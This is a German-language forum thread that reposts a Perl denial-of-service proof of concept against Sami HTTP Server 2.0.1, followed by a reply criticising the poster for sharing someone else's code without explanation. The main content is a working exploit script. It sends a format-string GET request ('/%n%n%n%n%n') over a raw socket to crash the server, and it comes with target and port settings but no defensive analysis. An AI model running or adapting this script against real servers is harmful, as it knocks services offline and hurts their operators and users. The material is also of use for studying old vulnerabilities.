Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
Code:
#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
# Tested on: Windows XP SP3
# Type: DOS/POC
use IO::Socket;
$target = "127.0.0.1";
$port = 80;
$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
$sock->send($payload);
close($sock);
Irgendwas? Naja, eher ein Exploit.
Dieser Thread wurde [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] verlinkt, solltest du dir vielleicht mal durchlesen.
Einen Codeschnipsel, der noch dazu von jemand anderem ist, posten kann jeder, beschreiben wie er funktioniert und was er macht, da gehört schon ein bischen mehr dazu. Außerdem handelt es sich dabei laut der Website des Autors nur um ein Proof of Concept.
__________________
"They who can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety"
Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
Außerdem handelt es sich dabei laut der Website des Autors nur um ein Proof of Concept.
Linear-Darstellung
